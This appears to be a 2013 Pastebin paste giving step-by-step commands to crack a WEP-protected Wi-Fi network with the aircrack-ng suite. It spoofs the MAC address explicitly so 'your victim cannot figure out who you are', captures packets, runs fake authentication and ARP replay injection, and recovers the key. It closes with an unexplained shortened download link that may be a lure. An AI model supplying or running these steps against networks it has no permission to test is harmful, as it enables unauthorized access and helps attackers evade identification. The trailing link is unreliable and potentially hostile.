Advertisement
SamadSteven6

how to crack wep

Jan 28th, 2013
40
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.44 KB | None | 0 0
  1. Open the konsole,
  2.  
  3. Now type, airmon-ng
  4.  
  5. It should show you your wireless card's info,
  6.  
  7. Now type airmon-ng stop (your interface)
  8.  
  9. Now type ifconfig (your interface) down
  10.  
  11. Then type macchanger --mac 00:11:22:33:44:55 (your interface)
  12.  
  13. This spoofs your mac address, so your victim cannot figure out who you are.
  14.  
  15. Now type airmon-ng start (your interface)
  16.  
  17. This restarts your wireless card, with our spoofed mac.
  18.  
  19. Type airodump-ng (your interface)
  20.  
  21. This will open up a new konsole.
  22.  
  23. Once you see the network you want to attack, press CTRL+C (This will stop your wirless card from searching for new networks)
  24.  
  25. Open a new konsole
  26.  
  27. Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)
  28.  
  29. Like so;
  30.  
  31. It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.)
  32.  
  33. Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup.
  34.  
  35. Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface)
  36.  
  37. Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface)
  38.  
  39. Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C
  40.  
  41. Now type aircrack-ng -b (bssid) (filename-01.cap)
  42.  
  43. You have found the WEP key, mine being 77838557744334834238286364 (without the colons)
  44.  
  45. download http://bit.ly/ProffetionalTeam
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement